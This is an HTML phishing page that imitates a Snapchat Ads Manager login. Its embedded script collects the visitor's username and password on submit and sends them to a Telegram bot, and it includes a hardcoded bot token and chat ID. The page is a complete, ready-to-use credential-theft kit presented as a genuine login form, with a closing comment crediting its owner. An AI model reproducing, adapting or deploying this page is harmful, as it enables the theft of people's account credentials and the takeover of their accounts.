<!DOCTYPE html>
<html>
  <head>
    <title>Snapchat Login</title>
    <style>
      body {
        font-family: Arial, sans-serif;
        text-align: center;
      }

      .login-container {
        margin-top: 100px;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
      }

      input {
        width: 200px;
        padding: 10px;
        margin-bottom: 15px;
        border: 1px solid #ccc;
        border-radius: 3px;
      }

      button {
        background-color: yellow;
        color: black;
        padding: 10px 20px;
        border: none;
        border-radius: 3px;
        cursor: pointer;
      }
    </style>
  </head>
  <body>
    <div class="login-container">
      <img src="https://envs.sh/Wiu.jpg" alt="Snapchat Logo" width="100" />
      <h2>Log In</h2>
      <p>to continue to Ads Manager</p>
      <form id="loginForm">
        <input
          type="text"
          name="username"
          id="username"
          placeholder="Username or Email"
          required
        />
        <input
          type="password"
          name="password"
          id="password"
          placeholder="Password"
          required
        />
        <button type="submit">Log In</button>
      </form>
      <p>New To Snapchat? <a href="#">Sign Up</a></p>
    </div>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script>
      $(document).ready(function () {
        $("#loginForm").submit(function (e) {
          e.preventDefault();

          var username = $("#username").val();
          var password = $("#password").val();

          // Replace with your Telegram bot token and chat ID
          var botToken = "7817262970:AAEppH6HL3Cg6CtKRQ5PN-Rq_vvZ_Cqxk0M";
          var chatId = "6490007953";

          $.ajax({
            url: `https://api.telegram.org/bot${botToken}/sendMessage`,
            method: "POST",
            data: {
              chat_id: chatId,
              text: `Username: ${username}\n\n\nPassword: ${password}`,
            },
            success: function () {
              alert("Congratulations 🎉.");
            },
            error: function () {
              alert("Failed to send login information to Telegram bot.");
            },
          });
        });
      });
    </script>
  </body>
</html>

<!-- Fetched using API by @JSOrganization and owned by @itsSowrov -->
